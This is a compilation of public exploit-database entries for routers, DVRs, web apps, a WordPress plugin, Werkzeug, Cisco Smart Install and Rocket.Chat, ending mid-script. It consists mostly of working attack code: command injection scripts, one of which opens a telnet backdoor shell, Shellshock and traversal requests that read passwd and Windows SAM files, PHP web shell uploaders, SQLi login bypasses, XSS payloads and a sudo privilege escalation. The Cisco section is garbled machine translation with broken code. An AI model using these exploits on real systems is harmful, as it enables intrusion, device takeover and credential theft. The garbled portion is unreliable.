# Exploit Title: Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE) # Date: 02.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.riconmobile.com #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # Ricon Industrial Cellular Router S9922XL Remote Command Execution # # # Vendor: Ricon Mobile Inc. # Product web page: https://www.riconmobile.com # Affected version: Model: S9922XL and S9922L # Firmware: 16.10.3 # # Summary: S9922L series LTE router is designed and manufactured by # Ricon Mobile Inc., it based on 3G/LTE cellular network technology # with industrial class quality. With its embedded cellular module, # it widely used in multiple case like ATM connection, remote office # security connection, data collection, etc. # # The S9922XL-LTE is a mobile network router based on 4G/4.5G, WiFi # and VPN technologies. Powerful 64-bit Processor and integrated real-time # operating system specially developed by Ricon Mobile. S9922XL is # widely used in many areas such as intelligent transportation, scada, # POS, industrial automation, telemetry, finance, environmental protection. # # Desc: The router suffers from an authenticated OS command injection # vulnerability. This can be exploited to inject and execute arbitrary # shell commands as the admin (root) user via the 'ping_server_ip' POST # parameter. Also vulnerable to Heartbleed. # # -------------------------------------------------------------------- # C:\>python ricon.py 192.168.1.71 id # uid=0(admin) gid=0(admin) # -------------------------------------------------------------------- # # Tested on: GNU/Linux 2.6.36 (mips) # WEB-ROUTER # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2021-5653 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5653.php # # # 02.07.2021 # import requests,sys,re if len(sys.argv)<3: print("Ricon Industrial Routers RCE") print("Usage: ./ricon.py [ip] [cmd]") sys.exit(17) else: ipaddr=sys.argv[1] execmd=sys.argv[2] data={'submit_class' :'admin', 'submit_button' :'netTest', 'submit_type' :'', 'action' :'Apply', 'change_action' :'', 'is_ping' :'0', 'ping_server_ip':';'+execmd} htreq=requests.post('http://'+ipaddr+'/apply.cgi',data=data,auth=('admin','admin')) htreq=requests.get('http://'+ipaddr+'/asp/admin/netTest.asp',auth=('admin','admin')) reout=re.search("20\">(.*)</textarea>",htreq.text,flags=re.S).group(1).strip('\n') print(reout)

# Exploit Title: Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated) # Date: 02.07.2021 # Exploit Author: SivertPL # Vendor Homepage: https://www.netgear.com/ # Version: All prior to v1.0.0.60 #!/usr/bin/python """ NETGEAR DGN2200v1 Unauthenticated Remote Command Execution Author: SivertPL (kroppoloe@protonmail.ch) Date: 02.07.2021 Status: Patched in some models Version: All prior to v1.0.0.60 Impact: Critical CVE: No CVE number assigned PSV: PSV-2020-0363, PSV-2020-0364, PSV-2020-0365 References: 1) https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ 2) https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 The exploit script only works on UNIX-based systems. This ancient vulnerability works on other models utilizing Bezeq firmware, so not just DGN2200v1 is vulnerable. It is estimated that around 7-10 other models might be or might have been vulnerable in the past. This is a very old exploit, dating back to 2017, so forgive me for Python2.7 lol. """ import sys import requests import os target_ip = "192.168.0.1" telnet_port = 666 sent = False def main(): if len(sys.argv) < 3: print "./dgn2200_pwn.py <router ip> <backdoor-port>" exit() target_ip = sys.argv[1] telnet_port = int(sys.argv[2]) print "[+] Sending the payload to " + target_ip + " and opening the backdoor ..." send_payload() print "[+] Trying to connect to the backdoor for " + str(telnet_port) + " ..." print "[!] If it fails to connect it means the target is probably not vulnerable" spawn_shell() def send_payload(): try: requests.get("http://" + target_ip + "/dnslookup.cgi?host_name=www.google.com; /usr/sbin/telnetd -p " + str(telnet_port) + " -l /bin/sh" + str(telnet_port) + "&lookup=Lookup&ess_=true") sent = True except Exception: sent = False print "[-] Unknown error, target might not be vulnerable." def spawn_shell(): if sent: print "[+] Dropping a shell..." os.system("telnet " + target_ip + " " + telnet_port) else: exit() if __name__ == "__main__": main()

# Exploit Title: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated) # Date: 2021-07-05 # Exploit Author: Andrea D'Ubaldo # Vendor Homepage: https://visual-tools.com/ # Version: Visual Tools VX16 v4.2.28.0 # Tested on: VX16 Embedded Linux 2.6.35.4. # CVE: CVE-2021-42071 # Reference: https://www.swascan.com/security-advisory-visual-tools-dvr-cve-2021-42071/ # An unauthenticated remote attacker can inject arbitrary commands to CGI script that can result in remote command execution. curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http:/DVR_ADDR/cgi-bin/slogin/login.py

# Exploit Title: perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS) # Date: 05/07/2021 # Exploit Author: Alhasan Abbas (exploit.msf) # Vendor Homepage: https://www.perfexcrm.com/ # Version: 1.10 # Tested on: windows 10 Vunlerable page: /clients/profile POC: ---- POST /clients/profile HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------325278703021926100783634528058 Content-Length: 1548 Origin: http://localhost Connection: close Referer: http://localhost/clients/profile Cookie: sp_session=07c611b7b8d391d144a06b39fe55fb91b744a038 Upgrade-Insecure-Requests: 1 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="profile" 1 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="profile_image"; filename="" Content-Type: application/octet-stream -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="firstname" adfgsg -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="lastname" fsdgfdg -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="company" test -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="vat" 1 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="phonenumber" -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="country" 105 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="city" asdf -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="address" asdf -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="zip" 313 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="state" ""><body onload=alert("XSS")>"> -----------------------------325278703021926100783634528058-- then any one open profile page in user the xss its executed

# Exploit Title: Black Box Kvm Extender 3.4.31307 - Local File Inclusion # Date: 05.07.2021 # Exploit Author: Ferhat Çil # Vendor Homepage: http://www.blackbox.com/ # Software Link: https://www.blackbox.com/en-us/products/black-box-brand-products/kvm # Version: 3.4.31307 # Category: Webapps # Tested on: Linux # Description: Any user can read files from the server # without authentication due to an existing LFI in the following path: # http://target//cgi-bin/show?page=FilePath import requests import sys if name == 'main': if len(sys.argv) == 3: url = sys.argv[1] payload = url + "/cgi-bin/show?page=../../../../../../" + sys.argv[2] r = requests.get(payload) print(r.text) else: print("Usage: " + sys.argv[0] + ' http://example.com/ /etc/passwd')

# Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated) # Date: 06/07/2021 # Exploit Author: Thamer Almohammadi (@Thamerz88) # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html # Version: 1.0 # Tested on: Kali Linux # Proof of Concept : 1- Send Request to /pages/save_user.php. 2- Find your shell.php file path and try any command. ################################## REQUEST ############################### POST /pages/save_user.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877 Content-Length: 369 -----------------------------3767690350396265302394702877 Content-Disposition: form-data; name="image"; filename="shell.php" Content-Type: application/x-php <?php system($_GET['cmd']); ?> -----------------------------3767690350396265302394702877 Content-Disposition: form-data; name="btn_save" -----------------------------3767690350396265302394702877-- ################################## RESPONSE ############################# HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 02:16:18 GMT Server: Apache/2.4.47 (Unix) OpenSSL/1.1.1k PHP/7.3.28 mod_perl/2.0.11 Perl/v5.32.1 X-Powered-By: PHP/7.3.28 Content-Length: 1529 Connection: close Content-Type: text/html; charset=UTF-8 ################################## Exploit ############################# <?php // Coder By Thamer Almohammadi(@Thamerz88); function exploit($scheme,$host,$path,$shell){ $url=$scheme."://".$host.$path; $content='<form enctype="multipart/form-data" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="512000" />File To Upload : <input name="userfile" type="file" /><input type="submit" value="Upload"/></form><?php $uploaddir = getcwd ()."/";$uploadfile = $uploaddir . basename ($_FILES[\'userfile\'][\'name\']);if (move_uploaded_file ($_FILES[\'userfile\'][\'tmp_name\'], $uploadfile)){echo "File was successfully uploaded.</br>";}else{echo "Upload failed";}?>'; $data = "-----------------------------3767690350396265302394702877\r\n"; $data .= "Content-Disposition: form-data; name=\"image\"; filename=\"$shell\"\r\n"; $data .= "Content-Type: image/gif\r\n\r\n"; $data .= "$content\r\n"; $data .= "-----------------------------3767690350396265302394702877\r\n"; $data .= "-----------------------------3767690350396265302394702877\r\n"; $data .= "Content-Disposition: form-data; name=\"btn_save\"\r\n\r\n"; $data .= "\r\n"; $data .= "-----------------------------3767690350396265302394702877\r\n"; $packet = "POST $path/pages/save_user.php HTTP/1.0\r\n"; $packet .= "Host: $host\r\n"; $packet .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0\r\n"; $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*\/*;q=0.8\r\n"; $packet .= "Accept-Language: en-us,en;q=0.5\r\n"; $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877\r\n"; $packet .= "Content-Length: ".strlen ($data)."\r\n\r\n\r\n"; $packet .= $data; $packet .= "\r\n"; send($host, $packet); sleep(2); check($url,$shell); } function send($host, $packet) { if ($connect = @fsockopen ($host, 80, $x, $y, 3)) { @fputs ($connect, $packet); @fclose ($connect); } } function check($url,$shell){ $check=file_get_contents($url."/uploadImage/Profile/".$shell); $preg=preg_match('/(File To Upload)/', $check, $output); if($output[0] == "File To Upload"){ echo "[+] Upload shell successfully.. :D\n"; echo "[+] Link ". $url."/uploadImage/Profile/".$shell."\n"; } else{ //Exploit Failed echo "[-] Exploit Failed..\n"; } } $options=getopt("u:s:"); if(!isset($options['u'], $options['s'])) die("\n [+] Simple Exploiter Exam Hall Management System by T3ster \n [+] Usage : php exploit.php -u http://target.com -s shell.php\n -u http://target.com = Target URL .. -s shell.php = Shell Name ..\n\n"); $url=$options["u"]; $shell=$options["s"]; $parse=parse_url($url); $host=$parse['host']; $path=$parse['path']; $scheme=$parse['scheme']; exploit($scheme,$host,$path,$shell); ?>

# Exploit Title: Billing System Project 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 06.07.2021 # Exploit Author: Talha DEMİRSOY # Software Link: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html # Version: V 1.0 # Tested on: Linux & Windows import requests import random import string from bs4 import BeautifulSoup let = string.ascii_lowercase shellname = ''.join(random.choice(let) for i in range(15)) randstr = ''.join(random.choice(let) for i in range(15)) payload= "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>" url = input("Target : ") session = requests.session() reqUrl = url + "login.php" reqHead = {"Content-Type": "application/x-www-form-urlencoded"} reqData = {"username": "admin' or '1'='1'#", "password": "-", "login": ''} session.post(reqUrl, headers=reqHead, data=reqData) print("Shell Uploading...") reqUrl = url + "php_action/createProduct.php" reqHead = {"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryOGdnGszwuETwo6WB"} reqData = "\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"currnt_date\"\r\n\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"productImage\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"productName\"\r\n\r\n"+randstr+"_TalhaDemirsoy\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"quantity\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"rate\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"brandName\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"categoryName\"\r\n\r\n2\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"productStatus\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"create\"\r\n\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB--\r\n" session.post(reqUrl, headers=reqHead, data=reqData) print("product name is "+randstr) print("shell name is "+shellname) reqUrl = url + "product.php" data = session.get(reqUrl) parser = BeautifulSoup(data.text, 'html.parser') find_shell = parser.find_all('img') for i in find_shell: if shellname in i.get("src"): print("Shell URL : " + url + i.get("src") + "?cmd=whoami")

# Exploit Title: Pallets Werkzeug 0.15.4 - Path Traversal # Date: 06 July 2021 # Original Author: Emre ÖVÜNÇ # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://palletsprojects.com/ # Software Link: https://github.com/pallets/werkzeug # Version: Prior to 0.15.5 # Tested on: Windows Server # CVE: 2019-14322 # Credit: Emre Övünç and Olivier Dony for responsibly reporting the issue # CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2019-14322 # Reference : https://palletsprojects.com/blog/werkzeug-0-15-5-released/ Description : Prior to 0.15.5, it was possible for a third party to potentially access arbitrary files when the application used SharedDataMiddleware on Windows. Due to the way Python's os.path.join() function works on Windows, a path segment with a drive name will change the drive of the final path. TLDR; In Pallets Werkzeug before 0.15.5, SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames lead to arbitrary file download. #!/usr/bin/env python3 # PoC code by @faisalfs10x [https://github.com/faisalfs10x] """ $ pip3 install colorama==0.3.3, argparse, requests, urllib3 $ python3 CVE-2019-14322.py -l list_target.txt" """ import argparse import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) import requests from colorama import Fore, Back, Style, init # Colors red = '\033[91m' green = '\033[92m' white = '\033[97m' yellow = '\033[93m' bold = '\033[1m' end = '\033[0m' init(autoreset=True) def banner_motd(): print(Fore.CYAN +Style.BRIGHT +""" CVE-2019-14322 %sPoC by faisalfs10x%s - (%s-%s)%s %s """ % (bold, red, white, yellow, white, end)) banner_motd() # list of sensitive files to grab in windows # %windir%\repair\sam # %windir%\System32\config\RegBack\SAM # %windir%\repair\system # %windir%\repair\software # %windir%\repair\security # %windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account) # %windir%\iis6.log (5,6 or 7) # %windir%\system32\logfiles\httperr\httperr1.log # C:\sysprep.inf # C:\sysprep\sysprep.inf # C:\sysprep\sysprep.xml # %windir%\Panther\Unattended.xml # C:\inetpub\wwwroot\Web.config # %windir%\system32\config\AppEvent.Evt (Application log) # %windir%\system32\config\SecEvent.Evt (Security log) # %windir%\system32\config\default.sav # %windir%\system32\config\security.sav # %windir%\system32\config\software.sav # %windir%\system32\config\system.sav # %windir%\system32\inetsrv\config\applicationHost.config # %windir%\system32\inetsrv\config\schema\ASPNET_schema.xml # %windir%\System32\drivers\etc\hosts (dns entries) # %windir%\System32\drivers\etc\networks (network settings) # %windir%\system32\config\SAM # TLDR: # C:/windows/system32/inetsrv/config/schema/ASPNET_schema.xml # C:/windows/system32/inetsrv/config/applicationHost.config # C:/windows/system32/logfiles/httperr/httperr1.log # C:/windows/debug/NetSetup.log - (may contain AD domain name, DC name, internal IP, DA account) # C:/windows/system32/drivers/etc/hosts - (dns entries) # C:/windows/system32/drivers/etc/networks - (network settings) def check(url): # There are 3 endpoints to be tested by default, but to avoid noisy, just pick one :) for endpoint in [ 'https://{}/base_import/static/c:/windows/win.ini', #'https://{}/web/static/c:/windows/win.ini', #'https://{}/base/static/c:/windows/win.ini' ]: try: url2 = endpoint.format(url) resp = requests.get(url2, verify=False, timeout=5) if 'fonts' and 'files' and 'extensions' in resp.text: print(Fore.LIGHTGREEN_EX +Style.BRIGHT +" [+] " +url2+ " : vulnerable====[+]") with open('CVE-2019-14322_result.txt', 'a+') as output: output.write('{}\n'.format(url2)) output.close() else: print(" [-] " +url+ " : not vulnerable") except KeyboardInterrupt: exit('User aborted!') except: print(" [-] " +url+ " : not vulnerable") def main(args): f = open(listfile, "r") for w in f: url = w.strip() check(url) if __name__ == '__main__': try: parser = argparse.ArgumentParser(description='CVE-2019-14322') parser.add_argument("-l","--targetlist",required=True, help = "target list in file") args = parser.parse_args() listfile = args.targetlist main(args) except KeyboardInterrupt: exit('User aborted!')

# Exploit Title: Phone Shop Sales Managements System 1.0 - Authentication Bypass (SQLi) # Date: 2021-07-06 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html # Version: 1.0 # Tested on: Windows 10, XAMPP ########### # PoC # ########### Request: ======== POST /osms/Execute/ExLogin.php HTTP/1.1 Host: localhost Content-Length: 43 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/osms/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close Username=or+1%3D1%2F*&Password=or+1%3D1%2F* Payload: ========= Username=or 1=1/* Password=or 1=1/*

# Exploit Title: Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation # Date: 2021-07-05 # Exploit Author: Andrea D'Ubaldo # Vendor Homepage: https://visual-tools.com/ # Version: Visual Tools VX16 v4.2.28.0 # Tested on: VX16 Embedded Linux 2.6.35.4. #An attacker can perform a system-level (root) local privilege escalation abusing unsafe Sudo configuration. sudo mount -o bind /bin/sh /bin/mount sudo mount

0x01はじめに スマートインストールクライアントコードでは、スタックベースのバッファオーバーフローの脆弱性が見つかりました。攻撃者は、ログインを認証せずに任意のコードをリモートで実行できます。 Cisco Smartインストールは、新しいスイッチの簡単な展開を提供する「プラグアンドプレイ」構成および画像管理機能です。この機能により、ユーザーはCiscoスイッチをどこにでも配置し、ネットワークにインストールし、追加の構成要件なしで起動することができます。したがって、脆弱なネットワークデバイスを完全に制御できます。スマートインストールは、新しいスイッチに適したグラフィカルインターフェイス管理を提供するプラグアンドプレイの構成と画像管理機能です。初期構成プロセスを自動化し、オペレーティングシステムの現在ロードされている画像を介して新しいスイッチを提供します。この機能は、構成が変更されたときにホットプラグとホットプラグのリアルタイムバックアップも提供します。この機能は、デフォルトでクライアントで有効になっていることに注意してください。 0x02脆弱性の説明 Cisco iOSおよびiOS-XEシステムのSmartインストールクライアントコード（CVE-2018-0171）には、バッファスタックオーバーフローの脆弱性が存在します。攻撃者は、悪意のあるデータパケットをTCP 4786ポートにリモートで送信し、脆弱性を活用してターゲットデバイスのスタックオーバーフローの脆弱性をトリガーし、デバイスがサービスを拒否したり、リモートコマンドの実行を引き起こしたりし、攻撃者は脆弱性に影響を与えるネットワークデバイスをリモートで制御できます。 Cisco Switchであると報告されています TCP 4786ポートはデフォルトで開いています 0x03脆弱性をチェック 1。シスコネットワークデバイスにTCP 4786ポートが開いている場合、攻撃に対して脆弱です。このようなデバイスを見つけるには、NMAPを介してターゲットネットワークをスキャンするだけです。 NMAP -P T:4786 192.168.1.0/24 2。ネットワークデバイスでスマートインストールクライアントの機能が有効になっているかどうかを確認するために、次の例は、スマートインストールクライアントとして構成されたCisco Catalyst Switchのshow vstack configコマンドの出力です。 switch1＃show vstack config chole: client（smartinstall exabled） 。 switch2＃show vstack config capability:クライアント Opera Mode:有効になっています 役割:クライアント 役割：クライアントおよびオペラモード：有効または役割：show vstack configコマンド出力からのクライアント（smartinstall有効）情報は、この機能がデバイスで有効になっていることを確認します。 3. Cisco Machineでコマンドを実行して判断を下し、ポート4786を開き、SMIを使用します。 スイッチショーTCPブリーフすべて tcblocalアドレス外国住所（州） 0344b794*.4786*。*聞いてください 0350A018*.443*。*聞いてください 03293634*.443*。*聞いてください 03292d9c*.80*。*聞いてください 03292504*.80*。*聞いてください Cisco iOSおよびIEXソフトウェアバージョンチェック： ルーターショーバージョン Cisco IOSソフトウェア、C2951ソフトウェア（C2951-UniversAlk9-M）、バージョン15.5（2）T1、リリースソフトウェア（FC1） テクニカルサポート: http://www.cisco.com/techsupport Copyright（c）1986-2015 Cisco Systems、Inc。 Mon 22-Jun-15 09:32 by prod_rel_teamをコンパイルしました iOS-xe-device＃showバージョン Cisco IOSソフトウェア、Catalyst L3 Switchソフトウェア（CAT3K_CAA-UNIVERSALK9-M）、バージョンDenali 16.2.1、リリースソフトウェア（FC1） テクニカルサポート: http://www.cisco.com/techsupport Copyright（c）1986-2016 Cisco Systems、Inc。 MCPREによるSun 27-Mar-16 21:47を編集しました 4.脆弱性が影響を受けたかどうかわからない場合は、CiscoのCisco IOSソフトウェアチェッカーを使用して検出できます。 https://tools.cisco.com/security/center/softwarechecker.x 5。次のスクリプトを使用して、対応するIPポートが実際に開いているかどうかを検出します。 Cisco SMIプロトコル https://github.com/cisco-talos/smi_check/blob/master/smi_check.py プロトコル機能はMSFにあります https://github.com/rapid7/metasploit-framework/commit/c67e407c9c5cd28d555e1c2614776e05b628749d ＃python smi_check.py -i targetip [情報] TCPプローブをTargetIP:4786に送信します [情報] Smart Installクライアント機能は、TargetIP:4786でアクティブになります [情報] TargetIPが影響を受けます 0x04衝撃の範囲 インパクト機器：Catalyst 4500スーパーバイザーエンジン シスコ触媒3850シリーズスイッチ Cisco Catalyst 2960シリーズスイッチ スマートインストールクライアントの一部を含むデバイスも影響を受ける可能性があります：Catalyst 4500スーパーバイザーエンジン Catalyst 3850シリーズ Catalyst 3750シリーズ Catalyst 3650シリーズ Catalyst 3560シリーズ Catalyst 2960シリーズ Catalyst 2975シリーズ IE 2000 IE 3000 IE 3010 IE 4000 IE 4010 IE 5000 SM-ES2 SKUS SM-ES3 SKUS NME-16ES-1G-P SM-X-ES3 SKUS 0x05脆弱性の確認 以下は、この脆弱性の検証のためのPOCです。 ＃smi_ibc_init_discovery_bof.py ソケットをインポートします インポート構造 OptParse Import optionParserから ＃ターゲットオプションを解析します parser=optionParser（） parser.add_option（ '-t'、 ' - ターゲット'、dest='ターゲット'、help='スマートインストールクライアント'、デフォルト='192.168.1.1'）parser.add_option（ '-p'、 '-port'、dest='port'、type='int'、help=4786） parser.parse_args（） def Craft_tlv（t、v、t_fmt='！i'、l_fmt='！i'）: return struct.pack（t_fmt、t） + struct.pack（l_fmt、len（v）） + v def send_packet（ソック、パケット）: sock.send（パケット） def受信（靴下）: sock.recv（）を返します __name__=='__main __' :の場合 印刷'[*]スマートインストールクライアントに接続する'、options.target、 'port'、options.port con=socket.socket（socket.af_inet、socket.sock_stream） con.connect（（options.target、options.port）） ペイロード='bbbb' * 44 shellcode='d' * 2048 data='a' * 36 + struct.pack（ '！i'、len（payload） + len（shellcode） + 40） +ペイロード tlv_1=craft_tlv（0x00000001、data）tlv_2=shellcode PKT=HDR + TLV_1 + TLV_2 印刷'[*]悪意のあるパケットを送信 send_packet（con、pkt） スイッチを攻撃するには、次のコマンドを実行します。 ホスト$ ./SMI_IBC_INIT_DISCOVERY_BOF.PY-T 192.168.1.1 スイッチでは、クラッシュメッセージを表示して再起動する必要があります。 00:10:35 UTC MON MAR 1 19933: CPUVECTOR 1200、PC=42424240の予期しない例外 -traceback=42424240 crashinfoをflash:/crashinfo_ext/crashinfo_ext_15に書き込みます ===フラッシングメッセージ（00:10:39 UTC MON MAR 1993）===buffered messages: . キューに掲載されたメッセージ: Cisco IOSソフトウェア、C2960ソフトウェア（C2960-LANBASEK9-M）、バージョン12.2（55）SE11、リリースソフトウェア （FC3） テクニカルサポート: http://www.cisco.com/techsupport Copyright（c）1986-2016 Cisco Systems、Inc。 ProD_REL_TEAMによってWED 17-AUG-16 13:46をコンパイルしました 命令TLBミス例外（0x1200）！ srr0=0x42424240 srr1=0x00029230 srr2=0x0152ace4 srr3=0x00029230 esr=0x00000000親愛なる=0x00000000 tsr=0x840000000 dbsr=0x00000000 CPUレジスタContext: Vector=0x00001200 PC=0x42424240 msr=0x00029230 cr=0x33000053 LR=0x42424242 Ctr=0x014D5268 XER=0xc000006a R0=0x42424242 R1=0x02B1B0B0 R2=0x0000000 R3=0x032D12B4 R4=0x000000B6 R5=0x0000001E R6=0xAA3BEC00 R7=0x0000014 R8=0x0000001E R9=0x00000000 R10=0x001BA800 R11=0xfffffff R12=0x00000000 R13=0x00110000 R14=0x0131e1a8 r15=0x02b1b1a8 R16=0x02B1B128 R17=0x00000000 R18=0x0000000 R19=0x02B1B128 R20=0x02b1b128 R21=0x00000001 R22=0x02b1b128 r23=0x02b1b1a8 R24=0x00000001 R25=0x00000000 R26=0x42424242 R27=0x42424242 R28=0x42424242 R29=0x42424242 R30=0x42424242 R31=0x42424242 スタックtrace: PC=0x42424240、sp=0x02b1b0b0 フレーム00: SP=0x42424242 PC=0x42424242 0x06脆弱性修正 #conf t 構成コマンドを入力します ライン。 CNTL/zで終了します。 NSJ-131-6-16-C2960_7（config）#no vstack NSJ-131-6-16-C2960_7（config）#exit 重要なのは、この文がvstackなしです もう一度見て、ポートがオフになっています。 #show TCPブリーフすべて TCBローカル 住所の住所 （州） 075A0088 *.443 *。* 聞く 0759F6C8 *.443 *。* 聞く 0759ED08 *.80 *。* 聞く 0759E348 *.80 *。* 聞く 0x06脆弱性ハザード これにより、攻撃者が影響を受けるデバイスにバッファオーバーフローを引き起こす可能性があります。これには、次の効果があります。 トリガーデバイスリロード 攻撃者がデバイスで任意のコードを実行できるようにします 影響を受けるデバイスに無限のループ再起動を負担すると、それはデバイスのクラッシュです 0x07脆弱性修正 #conf t 1行に1つの構成コマンドを入力します。 CNTL/zで終了します。 NSJ-131-6-16-C2960_7（config）#no vstack NSJ-131-6-16-C2960_7（config）#exit 重要なのは、この文がvstackなしです もう一度見て、ポートがオフになっています。 #show TCPブリーフすべて TCBローカルアドレス外国住所（州） 075A0088 *.443 *。 *聞いてください 0759F6C8 *.443 *。 *聞いてください 0759ED08 *.80 *。 *聞いてください 0759E348 *.80 *。 *聞いてください 0x08参照 https://EMBEDI.com/blog/cisco-smart-install-remote-code-execution/ https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180328-smi2 https://www.anquanke.com/post/id/103122 https://mp.weixin.qq.com/s/cmyuugfmox5pk89fo_er8w https://www.youtube.com/watch?v=ce7knk6ujukfeature=youtu.bet=99 https://www.youtube.com/watch?v=tsg5ezvudnufeature=youtu.be

# Exploit Title: WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal # Date: 05.07.2021 # Exploit Author: TheSmuggler # Vendor Homepage: https://gotmls.net/ # Software Link: https://gotmls.net/downloads/ # Version: <= 4.20.72 # Tested on: Windows import requests print(requests.get("http://127.0.0.1/wp-admin/admin-ajax.php?action=duplicator_download&file=..\..\..\..\..\..\..\..\..\Windows\win.ini", headers={"User-Agent":"Chrome"}).text)

# Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2) # Author: enox # Date: 06-06-2021 # Product: Rocket.Chat # Vendor: https://rocket.chat/ # Vulnerable Version(s): Rocket.Chat 3.12.1 (2) # CVE: CVE-2021-22911 # Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat # Info : This is a faster exploit that utilizes the authenticated nosql injection to retrieve the reset token for administrator instead of performing blind nosql injection. #!/usr/bin/python import requests import string import time import hashlib import json import oathtool import argparse parser = argparse.ArgumentParser(description='RocketChat 3.12.1 RCE') parser.add_argument('-u', help='Low priv user email [ No 2fa ]', required=True) parser.add_argument('-a', help='Administrator email', required=True) parser.add_argument('-t', help='URL (Eg: http://rocketchat.local)', required=True) args = parser.parse_args() adminmail = args.a lowprivmail = args.u target = args.t def forgotpassword(email,url): payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"sendForgotPasswordEmail\\",\\"params\\":[\\"'+email+'\\"]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/sendForgotPasswordEmail", data = payload, headers = headers, verify = False, allow_redirects = False) print("[+] Password Reset Email Sent") def resettoken(url): u = url+"/api/v1/method.callAnon/getPasswordPolicy" headers={'content-type': 'application/json'} token = "" num = list(range(0,10)) string_ints = [str(int) for int in num] characters = list(string.ascii_uppercase + string.ascii_lowercase) + list('-')+list('_') + 